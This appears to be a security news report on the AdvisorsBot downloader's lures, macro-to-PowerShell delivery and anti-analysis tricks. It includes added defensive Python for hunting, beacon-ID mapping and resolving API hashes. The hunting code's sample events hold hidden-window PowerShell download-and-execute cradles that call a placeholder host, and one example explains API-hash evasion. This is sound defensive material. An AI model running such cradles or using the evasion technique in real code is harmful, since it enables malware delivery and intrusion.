A new downloader was disclosed today, sporting significant anti-analysis features and increasingly sophisticated distribution techniques.
Researchers at Proofpoint have been tracking the downloader as a first-stage payload in campaigns since May 2018. Dubbed AdvisorsBot (due to early command-and-control domains, all containing the word “advisors”), it has been targeting hotels, restaurants and telecom-sector victims.
“A majority of the targets were located in the United States, but we’ve observed this threat globally,” Chris Dawson, threat intelligence lead at Proofpoint, told Threatpost. “To date, the campaigns have targeted thousands of recipients.”
The research team said in a post Thursday that the campaigns use several themes in their email lures, including a “grievance” gambit.
One lure, aimed at hotels, purports to come from a guest who claims to have been double charged and attaches a .doc presented as the hotel receipt.
Another targets food-service businesses and claims to come from a customer who suffered food poisoning after eating at the restaurant. The email says the customer's attorney is preparing a lawsuit and that the attached .doc contains a doctor's opinion on the matter.
Finally, an email sent to telecommunications companies is more mainstream, claiming to be from a job-seeker and featuring a “CV/resume” .doc.
Once a victim opened the document, they were prompted to “Enable Content,” which ran a malicious macro. Interestingly, the actors behind the campaigns have changed how that macro delivers the payload over time. In the May and June campaigns, the macro executed a PowerShell command that downloaded and executed the AdvisorsBot binary.
In August, the actor shifted tactics: the macro ran an initial PowerShell command that downloaded a second PowerShell script, and that script executed embedded shellcode which ran AdvisorsBot in memory without writing it to disk.
Finally, on August 15, the actor made another major change. The macro now downloads and executes a PowerShell version of the AdvisorsBot payload itself, which researchers dubbed PoshAdvisor.
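All three delivery variants described above share one pivot: an Office application spawning PowerShell that reaches out to download something, whether a binary, a second-stage script or the PowerShell payload itself. The following is an added example (not Proofpoint's or the article's code) of hunting for that pivot in process-creation telemetry. The event fields mirror Sysmon Event ID 1 names, the sample events are constructed for the example, and `example.invalid` is a placeholder host, not an AdvisorsBot C&C domain.

```python
import base64
import re
from typing import Dict, List, Optional

# A PowerShell child of one of these is the macro-driven launch we want to see.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# Download-and-run indicators; these fire whether the macro fetches a binary,
# a second script, or the PowerShell payload directly.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|DownloadData|Net\.WebClient|Invoke-WebRequest|"
    r"\biwr\b|Invoke-RestMethod|\birm\b|Start-BitsTransfer|\bcurl\b|\bwget\b",
    re.IGNORECASE,
)
HIDDEN_WINDOW = re.compile(r"-w[a-z]*\s+hidden", re.IGNORECASE)
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding for an Office -> PowerShell launch, with indicators, else None."""
    parent = _basename(event.get("ParentImage", ""))
    child = _basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in POWERSHELL_IMAGES:
        return None
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    # Search the decoded command too, so -enc does not hide the cradle.
    searchable = cmdline if decoded is None else f"{cmdline}\n{decoded}"
    indicators = ["office_spawned_powershell"]
    if HIDDEN_WINDOW.search(cmdline):
        indicators.append("hidden_window")
    if decoded is not None:
        indicators.append("encoded_command")
    if DOWNLOAD_CRADLE.search(searchable):
        indicators.append("download_cradle")
    return {"parent": parent, "command_line": cmdline, "decoded": decoded, "indicators": indicators}


def hunt(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    return [f for f in (analyze_event(e) for e in events) if f is not None]


# Constructed sample telemetry (not real captures). The second event carries the
# same cradle as the first, but base64/UTF-16LE encoded the way -enc expects.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/s.ps1')".encode("utf-16le")
).decode("ascii")
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('https://example.invalid/a.ps1')\""},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell -nop -w hidden -enc {ENCODED_PAYLOAD}"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-ChildItem C:\\Temp"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\splwow64.exe",
     "CommandLine": "splwow64.exe 12288"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding["parent"], finding["indicators"])
```

Run against real telemetry, the bare `office_spawned_powershell` indicator is noisy in some environments (legitimate add-ins do it), so alert on the combination with `download_cradle` or `encoded_command` and treat the bare hit as a hunting lead.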
Once AdvisorsBot has been downloaded and executed, the malware communicates with its C&C server over HTTPS. The beacon carries encoded data that identifies the victim using the Windows SID and the CRC32 hash of the computer name.
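Because the victim identifier is derived from the computer name with a public checksum rather than a random value, a defender who extracts a CRC32 from decoded C&C traffic can map it back to a host by precomputing the hash of every hostname in the inventory. The following is an added example (not Proofpoint's or the article's code) of that lookup. The article does not say which byte encoding of the computer name AdvisorsBot hashes, so the code tries the plausible ones (ASCII and UTF-16LE, as given and upper-cased) and lets the match reveal it; the hostnames are constructed for the example, and the SID half of the identifier is not modeled.

```python
import zlib
from typing import Dict, Iterable, Iterator, List, Tuple


def crc32_hex(data: bytes) -> str:
    """Lower-case 8-digit hex CRC32 (zlib's polynomial, the usual one)."""
    return f"{zlib.crc32(data) & 0xFFFFFFFF:08x}"


def candidate_encodings(name: str) -> Iterator[Tuple[str, bytes]]:
    """Byte forms a Windows computer name might be hashed in.
    Assumption: the article does not state AdvisorsBot's encoding, so keep each
    variant. NetBIOS names are stored upper-case, hence the upper() variant."""
    for form in sorted({name, name.upper()}):
        yield "ascii", form.encode("ascii")
        yield "utf-16le", form.encode("utf-16le")


def build_crc_index(hostnames: Iterable[str]) -> Dict[str, List[Tuple[str, str]]]:
    """Map CRC32 hex -> [(hostname, encoding)] for every host and encoding variant."""
    index: Dict[str, List[Tuple[str, str]]] = {}
    for host in hostnames:
        for encoding, raw in candidate_encodings(host):
            index.setdefault(crc32_hex(raw), []).append((host, encoding))
    return index


def resolve_crc(index: Dict[str, List[Tuple[str, str]]], observed: str) -> List[Tuple[str, str]]:
    """Hosts whose computer name hashes to the CRC32 pulled from a decoded beacon."""
    return index.get(observed.strip().lower(), [])


# Constructed inventory for the example, not a real environment.
INVENTORY = ["HOTEL-FD-01", "HOTEL-FD-02", "DINER-POS-7", "telco-hr-laptop"]

if __name__ == "__main__":
    index = build_crc_index(INVENTORY)
    seen = crc32_hex(b"HOTEL-FD-02")  # stands in for a value decoded from traffic
    print(seen, "->", resolve_crc(index, seen))
```

CRC32 is a 32-bit value, so across a large inventory two hosts can collide; treat a match as a lead to confirm against the SID portion of the beacon, not as proof on its own.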
Anti-Analysis and Modules
AdvisorsBot employs a number of anti-analysis features, as well as a modular component.
The malware uses junk code, such as extra instructions, conditional statements and loops, to slow down reverse engineering. It also uses Windows API function hashing: rather than importing functions by name, it resolves them at run time from hashes of their names, so the names of the APIs it calls never appear in the binary and the malware's functionality is harder to identify.
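To make the API-hashing point concrete, the following is an added example (not code from the article or from AdvisorsBot) showing both sides of the technique: the run-time lookup that walks a module's export names and picks the one whose hash matches, and the analyst's inverse, which hashes a list of candidate API names under each suspected algorithm and resolves the constants found in the binary. The article does not say which hash AdvisorsBot uses, so the ROR-13 and DJB2 schemes here are illustrative choices, and the candidate export list is a constructed stub (against a real sample you would feed every export of the DLLs it loads).

```python
from typing import Callable, Dict, Iterable, List, Optional, Tuple

MASK32 = 0xFFFFFFFF


def ror32(value: int, bits: int) -> int:
    """32-bit rotate right."""
    bits %= 32
    return ((value >> bits) | (value << (32 - bits))) & MASK32


def hash_ror13(name: str) -> int:
    """ROR-13 accumulate over the name plus its terminating NUL, in the style of
    common position-independent shellcode. Illustrative: not AdvisorsBot's algorithm."""
    h = 0
    for byte in name.encode("ascii") + b"\x00":
        h = (ror32(h, 13) + byte) & MASK32
    return h


def hash_djb2(name: str) -> int:
    """DJB2 string hash, a second scheme so the resolver is shown algorithm-agnostic."""
    h = 5381
    for byte in name.encode("ascii"):
        h = (h * 33 + byte) & MASK32
    return h


HASHERS: Dict[str, Callable[[str], int]] = {"ror13": hash_ror13, "djb2": hash_djb2}

# Constructed stand-in for the export tables of kernel32/wininet.
CANDIDATE_EXPORTS: List[str] = [
    "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualProtect",
    "CreateThread", "CreateProcessA", "WriteFile", "ReadFile",
    "InternetOpenA", "InternetConnectA", "HttpOpenRequestA", "HttpSendRequestA",
]


def resolve_export_by_hash(export_names: Iterable[str], wanted: int,
                           hasher: Callable[[str], int] = hash_ror13) -> Optional[str]:
    """What the malware does at run time: walk a module's export table and return
    the name whose hash equals the constant embedded in the binary."""
    for name in export_names:
        if hasher(name) == wanted:
            return name
    return None


def build_hash_table(names: Iterable[str],
                     hashers: Dict[str, Callable[[str], int]] = HASHERS) -> Dict[int, List[Tuple[str, str]]]:
    """Analyst side: hash -> [(algorithm, API name)] over every candidate and algorithm."""
    table: Dict[int, List[Tuple[str, str]]] = {}
    for algo, fn in hashers.items():
        for name in names:
            table.setdefault(fn(name), []).append((algo, name))
    return table


def resolve_hashes(observed: Iterable[int],
                   table: Dict[int, List[Tuple[str, str]]]) -> Dict[int, List[Tuple[str, str]]]:
    """Map each constant pulled from the binary to its matching (algorithm, name) pairs;
    an empty list means no candidate matched under any algorithm tried."""
    return {h: table.get(h, []) for h in observed}


if __name__ == "__main__":
    # Constants an analyst might lift from a disassembly; here derived from the stub list.
    lifted = [hash_ror13("VirtualAlloc"), hash_ror13("InternetOpenA"), hash_djb2("CreateThread")]
    for value, hits in resolve_hashes(lifted, build_hash_table(CANDIDATE_EXPORTS)).items():
        print(f"{value:08x} -> {hits}")
```

The resolver is only as good as its candidate list and its set of algorithms: if the sample uses an unrecognized hash, every lookup comes back empty, and the next step is to lift the hashing loop itself from the disassembly and add it as a third entry in `HASHERS`.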
The malware also ships a basic system fingerprinting module. Its modular design lets the operators adapt the malware, adding capabilities as they become available or downloading additional modules after infection, researchers said. The fingerprinting module takes a screenshot and base64-encodes it, extracts Microsoft Outlook account details, and runs an array of other commands. A system fingerprinting module was also recently found in Marap, another downloader that researchers detailed last week.
“AdvisorsBot, along with another similar but unrelated malware that we detailed last week, point to a growing trend of small, versatile malware that give actors flexibility to launch future attacks and identify systems of interest that may lend themselves to more significant compromise,” the researchers said in the post. “AdvisorsBot is under active development and we have also observed another version of the malware completely rewritten in PowerShell and .NET.”